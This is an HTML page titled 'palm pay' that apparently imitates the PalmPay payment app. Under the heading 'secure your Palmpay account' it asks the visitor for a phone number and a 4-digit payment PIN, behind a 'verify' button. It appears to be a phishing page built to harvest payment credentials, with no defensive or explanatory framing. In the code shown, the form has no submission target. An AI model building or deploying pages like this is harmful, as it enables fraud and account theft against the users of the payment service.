<!DOCTYPE>
<html>
<head>
<title>palm pay</title>
<style>
 body {
       background-color: #FFF;
       font-size: 20px;
        width: 1010px;
        hight: 100%;
        text-align: center;
      }
   .pageTitle{
        border: none;
        wight: 1009px;
        hight: 600px;
        font-size: 50px;
       text-align: center;
        color: #000;
        padding-top: 20px;
    }
  .nice svg {margin-right: 10px; vertical-align: top;}
.nice {
height: 100px; 
width: 800px; 
color: #fff; 
background: #9DACB6; 
outline: none; 
border: none; 
border-radius: 50px; 
font-size: 50px; 
font-weight: 400; 
margin: 8px 0; 
transition: all 0.4s ease;}
.nice:hover {
background: #6306B2;
color: #FFF;
}
 .numbers{
         height: 100px; 
         width: 600px;
         border: 2px solid #9DACB6;
         border-radius: 20px 50px 50px 20px;
         background-color: #F8F8FB;
         color: #000;
         font-size: 40px;
         padding: 0 0 0 20px;
     }
  .inputss {
        width: 1006px;
        hight: 109px;
        border: none;
        font-weight: bold;
        display: flex;
        flex-direction: row;
        color: #000;
        margin: 0 0 40px 0;
         }
 .label {
         font-size: 49px;
         color: #6306B2;
         font-weight: bold;
         font-family: Courier New;
     }
   .number{
         height: 100px; 
         width: 400px;
         border: 2px solid #9DACB6;
         border-radius: 20px;
         background-color: #F8F8FB;
         margin: 10px;
         color: #000;
         font-size: 45px;
         padding: 0 148px 0 148px;
     }
  .inputs {
        width: 1006px;
        hight: 109px;
        border: none;
        font-weight: bold;
        display: flex;
        flex-direction: row;
        color: #000;
        margin: 0 0 40px 0;
        justify-content: center;
         }
  span {
         background-color: #6306B2;
         color: FFFFFF;
         font-size: 40px;
        }
 .pin { border: none;
        font-size: 30px;
       text-align: center;
        color: #000;
    }
</style>
</head>
<body>
    <div class="pageTitle">
     <h3>secure your Palmpay account</h3>
    </div>
 <div class="form">
 <form>
    <div class="inputss">
      <label class="label" for="phone_number">phone number</label>
      <input type="tel" class="numbers" id="mobile" placeholder="phone number" name="mobile" value="" required>
    </div>
     <div class="pin">
     <h4>Verify payment PIN to continue</h4>
     <h3><span>4-degits payment PIN</span></h3>
    <div class="inputs">
      <input type="tel" class="number" placeholder="PIN" id="mobile" name="mobile" value="" required>
    </div>
    </div>
    <div class="but">
      <button type="submit" id="regButton" class="nice"">verify</button>
    </div>
 </form>
 </div>
</body>
</html>
